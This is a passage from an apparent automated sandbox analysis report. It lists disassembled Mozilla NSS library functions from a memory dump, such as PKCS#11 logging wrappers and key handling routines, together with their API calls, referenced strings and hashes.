strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C696F90
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C696FC5
PK11_GetInternalKeySlot.NSS3 ref: 6C696FF4

Strings

+`jl, xrefs: 6C696D0D

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: free$strcmp$strncmp$FlagL_strncasecmp$Strip$InternalK11_ParameterSecureSkipSlot
String ID: +`jl
API String ID: 1304971872-3317076573
Opcode ID: 526dde810fb2fae6740dbe8898befa10cdb0071ce74483e1ea99b1ea275f99c5
Instruction ID: 51ebf55746ee75ca23376b80f47fe103eabd56014f05637eb2b51fc32ab9cc19
Opcode Fuzzy Hash: 526dde810fb2fae6740dbe8898befa10cdb0071ce74483e1ea99b1ea275f99c5
Instruction Fuzzy Hash: 8AB15BB0E0530A9FDF40DBA5DC44BAEBBB9AF05359F140025E815E7A10E731E915CBE9

Function 6C6889B0 Relevance: 35.1, APIs: 11, Strings: 9, Instructions: 149COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GenerateKey), ref: 6C6889D6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C688A04
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C688A13

Part of subcall function 6C76D930: PL_strncpyz.NSS3(?,?,?), ref: 6C76D963

PR_LogPrint.NSS3(?,00000000), ref: 6C688A29
PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6C688A4B
PR_LogPrint.NSS3( pTemplate = 0x%p,?), ref: 6C688A67
PR_LogPrint.NSS3( ulCount = %d,?), ref: 6C688A83
PR_LogPrint.NSS3( phKey = 0x%p,?), ref: 6C688AA1
PL_strncpyz.NSS3(?, *phKey = 0x%x,00000050), ref: 6C688B43
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C688B52
PR_LogPrint.NSS3(?,00000000), ref: 6C688B68

Strings

(CK_INVALID_HANDLE), xrefs: 6C688A0C, 6C688B4B
pMechanism = 0x%p, xrefs: 6C688A46
*phKey = 0x%x, xrefs: 6C688B2D, 6C688B3D
ulCount = %d, xrefs: 6C688A7E
hSession = 0x%x, xrefs: 6C6889EE, 6C6889FE
phKey = 0x%p, xrefs: 6C688A9C
nvl, xrefs: 6C688AD0, 6C688B0B
C_GenerateKey, xrefs: 6C6889D1
pTemplate = 0x%p, xrefs: 6C688A62

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *phKey = 0x%x$ hSession = 0x%x$ pMechanism = 0x%p$ pTemplate = 0x%p$ phKey = 0x%p$ ulCount = %d$ (CK_INVALID_HANDLE)$C_GenerateKey$nvl
API String ID: 1003633598-4048850142
Opcode ID: 0d1526748654982e394126239250e2fe5706db3aab06afa4355d100a3ef09c04
Instruction ID: 893b2cf19544782acfdbdbccb7b66a1400b89e8e134b1d2066fca3899aaf3d7a
Opcode Fuzzy Hash: 0d1526748654982e394126239250e2fe5706db3aab06afa4355d100a3ef09c04
Instruction Fuzzy Hash: 3F517570602248AFDB00DF55DE8CE9B3B75AB4674CF044035E9096BA51DB34AD19CBBE

Function 6C68AB10 Relevance: 35.1, APIs: 10, Strings: 10, Instructions: 127COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DecryptMessageNext), ref: 6C68AB36
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C68AB64
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C68AB73

Part of subcall function 6C76D930: PL_strncpyz.NSS3(?,?,?), ref: 6C76D963

PR_LogPrint.NSS3(?,00000000), ref: 6C68AB89
PR_LogPrint.NSS3( pParameter = 0x%p,?), ref: 6C68ABAB
PR_LogPrint.NSS3( ulParameterLen = 0x%p,?), ref: 6C68ABC6
PR_LogPrint.NSS3( pCiphertextPart = 0x%p,?), ref: 6C68ABE1
PR_LogPrint.NSS3( ulCiphertextPartLen = %d,?), ref: 6C68ABFC
PR_LogPrint.NSS3( pPlaintextPart = 0x%p,?), ref: 6C68AC17
PR_LogPrint.NSS3( pulPlaintextPartLen = 0x%p,?), ref: 6C68AC30

Strings

ulCiphertextPartLen = %d, xrefs: 6C68ABF7
pParameter = 0x%p, xrefs: 6C68ABA6
pCiphertextPart = 0x%p, xrefs: 6C68ABDC
C_DecryptMessageNext, xrefs: 6C68AB31
(CK_INVALID_HANDLE), xrefs: 6C68AB6C
pulPlaintextPartLen = 0x%p, xrefs: 6C68AC2B
ulParameterLen = 0x%p, xrefs: 6C68ABC1
hSession = 0x%x, xrefs: 6C68AB4E, 6C68AB5E
nvl, xrefs: 6C68AC4B, 6C68AC88
pPlaintextPart = 0x%p, xrefs: 6C68AC12

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pCiphertextPart = 0x%p$ pParameter = 0x%p$ pPlaintextPart = 0x%p$ pulPlaintextPartLen = 0x%p$ ulCiphertextPartLen = %d$ ulParameterLen = 0x%p$ (CK_INVALID_HANDLE)$C_DecryptMessageNext$nvl
API String ID: 1003633598-556212588
Opcode ID: 57768dae8fdeafc74db35c019f728f04727e07643e617a70d70ca422ab09e16f
Instruction ID: 59a559ae5f9892a2082deff1f1fa9b167c156e2e935479284ae234f4ec6636c0
Opcode Fuzzy Hash: 57768dae8fdeafc74db35c019f728f04727e07643e617a70d70ca422ab09e16f
Instruction Fuzzy Hash: 7441A435603148EFDF008F55DE4CE8A3BB2AB5671DF094424FD086BA52DB319958CBAE

Function 6C68AF20 Relevance: 35.1, APIs: 10, Strings: 10, Instructions: 126COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_SignMessage), ref: 6C68AF46
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C68AF74
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C68AF83

Part of subcall function 6C76D930: PL_strncpyz.NSS3(?,?,?), ref: 6C76D963

PR_LogPrint.NSS3(?,00000000), ref: 6C68AF99
PR_LogPrint.NSS3( pParameter = 0x%p,?), ref: 6C68AFBE
PR_LogPrint.NSS3( ulParameterLen = 0x%p,?), ref: 6C68AFD9
PR_LogPrint.NSS3( pData = 0x%p,?), ref: 6C68AFF4
PR_LogPrint.NSS3( ulDataLen = %d,?), ref: 6C68B00F
PR_LogPrint.NSS3( pSignature = 0x%p,?), ref: 6C68B028
PR_LogPrint.NSS3( pulSignatureLen = 0x%p,?), ref: 6C68B041

Strings

pSignature = 0x%p, xrefs: 6C68B023
pParameter = 0x%p, xrefs: 6C68AFB9
(CK_INVALID_HANDLE), xrefs: 6C68AF7C
pulSignatureLen = 0x%p, xrefs: 6C68B03C
ulParameterLen = 0x%p, xrefs: 6C68AFD4
hSession = 0x%x, xrefs: 6C68AF5E, 6C68AF6E
nvl, xrefs: 6C68B059, 6C68B093
pData = 0x%p, xrefs: 6C68AFEF
C_SignMessage, xrefs: 6C68AF41
ulDataLen = %d, xrefs: 6C68B00A

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pData = 0x%p$ pParameter = 0x%p$ pSignature = 0x%p$ pulSignatureLen = 0x%p$ ulDataLen = %d$ ulParameterLen = 0x%p$ (CK_INVALID_HANDLE)$C_SignMessage$nvl
API String ID: 1003633598-1382018852
Opcode ID: 99e5c1c3b53c8470ea355d46e1cb68d4f3ec0de84946c4a6efb09cae0f9b7e4d
Instruction ID: bf35ad67a149e4df1a710817b9f3a493dcd075271e7e57e7f7bdb1c540d77e1c
Opcode Fuzzy Hash: 99e5c1c3b53c8470ea355d46e1cb68d4f3ec0de84946c4a6efb09cae0f9b7e4d
Instruction Fuzzy Hash: 7141A575602148AFDB109F55DE4CE8A7BB2AB4630DF084034F9086BA51DB309958CBBE

Function 6C6808F0 Relevance: 33.5, APIs: 13, Strings: 6, Instructions: 230COMMON

Download Yara Rule

APIs

htonl.WSOCK32(-00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 6C68094D
htonl.WSOCK32(-00000001,-00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C680953
htonl.WSOCK32(-00000001,-00000001,-00000001), ref: 6C68096E
htonl.WSOCK32(-00000001,-00000001,-00000001,-00000001), ref: 6C680974
htonl.WSOCK32(-00000001,-00000001,-00000001,-00000001,-00000001), ref: 6C68098F
htonl.WSOCK32(-00000001,-00000001,-00000001,-00000001,-00000001,-00000001), ref: 6C680995

Part of subcall function 6C681800: SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C681860
Part of subcall function 6C681800: memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00000000,?,-00000001,?,6C6809BF), ref: 6C681897
Part of subcall function 6C681800: memcpy.VCRUNTIME140(?,-00000001,-00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C6818AA
Part of subcall function 6C681800: memcpy.VCRUNTIME140(?,?,?), ref: 6C6818C4

PK11_FreeSymKey.NSS3(00000000,?,?,?,?,?,?,?,-00000001,-00000001,-00000001,-00000001), ref: 6C680B4F
SECITEM_ZfreeItem_Util.NSS3(?,00000000,?,?,?,?,?,?,?,?,-00000001,-00000001,-00000001,-00000001), ref: 6C680B5E
SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,-00000001,-00000001,-00000001,-00000001), ref: 6C680B6B
SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,-00000001,-00000001), ref: 6C680B78

Strings

base_nonce, xrefs: 6C680B06
key, xrefs: 6C680ACB
exp, xrefs: 6C680B36
info_hash, xrefs: 6C6809E0
secret, xrefs: 6C680A88
psk_id_hash, xrefs: 6C6809B5

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: htonl$Item_Util$Zfreememcpy$AllocFreeK11_
String ID: base_nonce$exp$info_hash$key$psk_id_hash$secret
API String ID: 1637529542-763765719
Opcode ID: fd8dc6d804d04a64db0c3eee302dc51cffdca7feebf56eff9bd83bc0c85f2854
Instruction ID: e036a1987810f305edc4827c32180fe1c390e19f7ece5e3369587b15af6fcdbe
Opcode Fuzzy Hash: fd8dc6d804d04a64db0c3eee302dc51cffdca7feebf56eff9bd83bc0c85f2854
Instruction Fuzzy Hash: 10819A75605305AFC700CF55CD80A9AF7E8EF8D708F048929FA9887751E731EA19CBA6

Function 6C692D80 Relevance: 33.4, APIs: 22, Instructions: 381COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,?,?,00000000,?), ref: 6C692DEC
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,?), ref: 6C692E00
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C692E2B
PR_SetError.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C692E43
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,6C664F1C,?,-00000001,00000000,?), ref: 6C692E74
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,?,6C664F1C,?,-00000001,00000000), ref: 6C692E88
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C692EC6
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C692EE4
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C692EF8
PR_Unlock.NSS3(?), ref: 6C692F62
TlsGetValue.KERNEL32 ref: 6C692F86
EnterCriticalSection.KERNEL32(0000001C), ref: 6C692F9E
PR_Unlock.NSS3(?), ref: 6C692FCA
TlsGetValue.KERNEL32 ref: 6C69301A
EnterCriticalSection.KERNEL32(?), ref: 6C69302E
PR_Unlock.NSS3(?), ref: 6C693066
PR_SetError.NSS3(00000000,00000000), ref: 6C693085
PR_Unlock.NSS3(?), ref: 6C6930EC
TlsGetValue.KERNEL32 ref: 6C69310C
EnterCriticalSection.KERNEL32(0000001C), ref: 6C693124
PR_Unlock.NSS3(?), ref: 6C69314C

Part of subcall function 6C679180: PK11_NeedUserInit.NSS3(?,?,?,00000000,00000001,6C6A379E,?,6C679568,00000000,?,6C6A379E,?,00000001,?), ref: 6C67918D
Part of subcall function 6C679180: PR_SetError.NSS3(FFFFE000,00000000,?,?,?,00000000,00000001,6C6A379E,?,6C679568,00000000,?,6C6A379E,?,00000001,?), ref: 6C6791A0

Part of subcall function 6C6407A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C5D204A), ref: 6C6407AD
Part of subcall function 6C6407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C5D204A), ref: 6C6407CD
Part of subcall function 6C6407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C5D204A), ref: 6C6407D6
Part of subcall function 6C6407A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C5D204A), ref: 6C6407E4
Part of subcall function 6C6407A0: TlsSetValue.KERNEL32(00000000,?,6C5D204A), ref: 6C640864
Part of subcall function 6C6407A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C640880
Part of subcall function 6C6407A0: TlsSetValue.KERNEL32(00000000,?,?,6C5D204A), ref: 6C6408CB
Part of subcall function 6C6407A0: TlsGetValue.KERNEL32(?,?,6C5D204A), ref: 6C6408D7
Part of subcall function 6C6407A0: TlsGetValue.KERNEL32(?,?,6C5D204A), ref: 6C6408FB

PR_SetError.NSS3(00000000,00000000), ref: 6C69316D

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Value$Unlock$CriticalEnterSection$Error$calloc$InitK11_NeedUser
String ID:
API String ID: 3383223490-0
Opcode ID: be5bfee79d8383336f47a5b82fc8c10427f5d6a04e65dc931633f8a46e565eea
Instruction ID: 5db7b98909653f67d8ccf35584931866b19ac49c434238806d40bbce8ab55597
Opcode Fuzzy Hash: be5bfee79d8383336f47a5b82fc8c10427f5d6a04e65dc931633f8a46e565eea
Instruction Fuzzy Hash: 2EF17CB5D0020AAFDF00DF64D888B9EBBB5BF09318F144169EC09A7721E731E995CB95

Function 6C6BC980 Relevance: 33.3, APIs: 22, Instructions: 298memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000400,6C6BAEB0,?,00000004,00000001,?,00000000,?,?), ref: 6C6BC98E

Part of subcall function 6C6B0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C6587ED,00000800,6C64EF74,00000000), ref: 6C6B1000
Part of subcall function 6C6B0FF0: PR_NewLock.NSS3(?,00000800,6C64EF74,00000000), ref: 6C6B1016
Part of subcall function 6C6B0FF0: PL_InitArenaPool.NSS3(00000000,security,6C6587ED,00000008,?,00000800,6C64EF74,00000000), ref: 6C6B102B

PORT_ArenaAlloc_Util.NSS3(00000000,00000028,?,6C6BAEB0,?,00000004,00000001,?,00000000,?,?), ref: 6C6BC9A1

Part of subcall function 6C6B10C0: TlsGetValue.KERNEL32(?,6C658802,00000000,00000008,?,6C64EF74,00000000), ref: 6C6B10F3
Part of subcall function 6C6B10C0: EnterCriticalSection.KERNEL32(?,?,6C658802,00000000,00000008,?,6C64EF74,00000000), ref: 6C6B110C
Part of subcall function 6C6B10C0: PL_ArenaAllocate.NSS3(?,?,?,6C658802,00000000,00000008,?,6C64EF74,00000000), ref: 6C6B1141
Part of subcall function 6C6B10C0: PR_Unlock.NSS3(?,?,?,6C658802,00000000,00000008,?,6C64EF74,00000000), ref: 6C6B1182
Part of subcall function 6C6B10C0: TlsGetValue.KERNEL32(?,6C658802,00000000,00000008,?,6C64EF74,00000000), ref: 6C6B119C

SECOID_FindOIDByTag_Util.NSS3(0000001A,?,?,?,6C6BAEB0,?,00000004,00000001,?,00000000,?,?), ref: 6C6BC9D3

Part of subcall function 6C6B0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C6B08B4

SECITEM_CopyItem_Util.NSS3(00000000,-00000018,00000000,?,?,?,?,6C6BAEB0,?,00000004,00000001,?,00000000,?,?), ref: 6C6BC9E6

Part of subcall function 6C6AFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C6A8D2D,?,00000000,?), ref: 6C6AFB85
Part of subcall function 6C6AFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C6AFBB1

PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,6C6BAEB0,?,00000004,00000001,?,00000000,?,?), ref: 6C6BC9F5
PORT_ArenaAlloc_Util.NSS3(00000000,00000050,?,?,?,?,?,?,?,6C6BAEB0,?,00000004,00000001,?,00000000,?), ref: 6C6BCA0A
SEC_ASN1EncodeInteger_Util.NSS3(00000000,00000000,00000001,?,?,?,?,?,?,?,?,?,6C6BAEB0,?,00000004,00000001), ref: 6C6BCA33
SECOID_FindOIDByTag_Util.NSS3(00000019,?,?,?,?,?,?,?,?,?,?,?,?,6C6BAEB0,?,00000004), ref: 6C6BCA4D
SECITEM_CopyItem_Util.NSS3(00000001,?,00000000), ref: 6C6BCA60
SEC_PKCS7DestroyContentInfo.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,6C6BAEB0,?,00000004), ref: 6C6BCA6D
PR_Now.NSS3 ref: 6C6BCAD6
PORT_ArenaMark_Util.NSS3(00000000), ref: 6C6BCB23
PORT_ArenaAlloc_Util.NSS3(00000000,0000005C), ref: 6C6BCB32
SEC_ASN1EncodeInteger_Util.NSS3(00000000,00000000,00000001), ref: 6C6BCB64
SECOID_SetAlgorithmID_Util.NSS3(00000000,?,00000001,00000000), ref: 6C6BCBBB
PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6C6BCBD0
PORT_ArenaAlloc_Util.NSS3(00000000,00000018), ref: 6C6BCBF6
PORT_ArenaAlloc_Util.NSS3(00000000,00000008), ref: 6C6BCC18
SECOID_SetAlgorithmID_Util.NSS3(00000000,00000000,00000001,00000000), ref: 6C6BCC39
PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C6BCC5B

Part of subcall function 6C6B10C0: PL_ArenaAllocate.NSS3(?,6C658802,00000000,00000008,?,6C64EF74,00000000), ref: 6C6B116E

PORT_ArenaAlloc_Util.NSS3(00000000,00000008), ref: 6C6BCC69
SECITEM_CopyItem_Util.NSS3(00000000,?,00000000), ref: 6C6BCC89

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Util$Arena$Alloc_$CopyItem_$AlgorithmAllocateArena_EncodeFindInteger_Tag_Value$ContentCriticalDestroyEnterErrorFreeInfoInitLockMark_PoolSectionUnlockcallocmemcpy
String ID:
API String ID: 1766420342-0
Opcode ID: aef02af035aa825a864897f9eb72ee08ac618cadc2889954afd84454c789a2cd
Instruction ID: 17467c526d92ccd90939399c36a77424aed5820e495303e51fac7745dd4fa945
Opcode Fuzzy Hash: aef02af035aa825a864897f9eb72ee08ac618cadc2889954afd84454c789a2cd
Instruction Fuzzy Hash: AAB1C3B5D00306AFEB00DF64CD81BAA77B4BF19348F104125E805B7751EB71EAA4CBA9

Function 6C6929A0 Relevance: 31.8, APIs: 15, Strings: 3, Instructions: 292COMMON

Download Yara Rule

APIs

PK11_ImportPublicKey.NSS3(00000000,?,00000000,?,?,?,?,?,^jfl,00000001,00000000,?,6C666540,?,0000000D,00000000), ref: 6C692A39
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,^jfl,00000001,00000000,?,6C666540,?,0000000D,00000000), ref: 6C692A5B
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,^jfl,00000001,00000000,?,6C666540,?,0000000D), ref: 6C692A6F
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,^jfl,00000001), ref: 6C692AAD
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,^jfl,00000001,00000000), ref: 6C692ACB
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,^jfl,00000001), ref: 6C692ADF
PR_Unlock.NSS3(?), ref: 6C692B38
PR_Unlock.NSS3(?), ref: 6C692B8B

Part of subcall function 6C6407A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C5D204A), ref: 6C6407AD
Part of subcall function 6C6407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C5D204A), ref: 6C6407CD
Part of subcall function 6C6407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C5D204A), ref: 6C6407D6
Part of subcall function 6C6407A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C5D204A), ref: 6C6407E4
Part of subcall function 6C6407A0: TlsSetValue.KERNEL32(00000000,?,6C5D204A), ref: 6C640864
Part of subcall function 6C6407A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C640880
Part of subcall function 6C6407A0: TlsSetValue.KERNEL32(00000000,?,?,6C5D204A), ref: 6C6408CB
Part of subcall function 6C6407A0: TlsGetValue.KERNEL32(?,?,6C5D204A), ref: 6C6408D7
Part of subcall function 6C6407A0: TlsGetValue.KERNEL32(?,?,6C5D204A), ref: 6C6408FB

PR_SetError.NSS3(FFFFE040,00000000,?,?,?,?,?,^jfl,00000001,00000000,?,6C666540,?,0000000D,00000000,?), ref: 6C692CA2

Strings

@efl, xrefs: 6C692A18, 6C692A22
^jfl, xrefs: 6C6929A5
@efl, xrefs: 6C6929E7, 6C692A1D

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Value$Unlock$CriticalEnterSectioncalloc$ErrorImportK11_Public
String ID: @efl$@efl$^jfl
API String ID: 2580468248-2758855697
Opcode ID: e7475d39e287dcdaa9744184bfc56f6e96a62647dc053cc28646ea4ef0742b7a
Instruction ID: f8e5d645083a789260fbe642f67ec5d31c2803fcd52b4af6db7fb5d3ba5b5381
Opcode Fuzzy Hash: e7475d39e287dcdaa9744184bfc56f6e96a62647dc053cc28646ea4ef0742b7a
Instruction Fuzzy Hash: 08B1DF75D00206EFDB10DF68D988BAAB7F5FF09318F148529E805A7B11E731E941CBA9

Function 6C686D60 Relevance: 31.6, APIs: 9, Strings: 9, Instructions: 119COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_Digest), ref: 6C686D86
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C686DB4
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C686DC3

Part of subcall function 6C76D930: PL_strncpyz.NSS3(?,?,?), ref: 6C76D963

PR_LogPrint.NSS3(?,00000000), ref: 6C686DD9
PR_LogPrint.NSS3( pData = 0x%p,?), ref: 6C686DFA
PR_LogPrint.NSS3( ulDataLen = %d,?), ref: 6C686E13
PR_LogPrint.NSS3( pDigest = 0x%p,?), ref: 6C686E2C
PR_LogPrint.NSS3( pulDigestLen = 0x%p,?), ref: 6C686E47
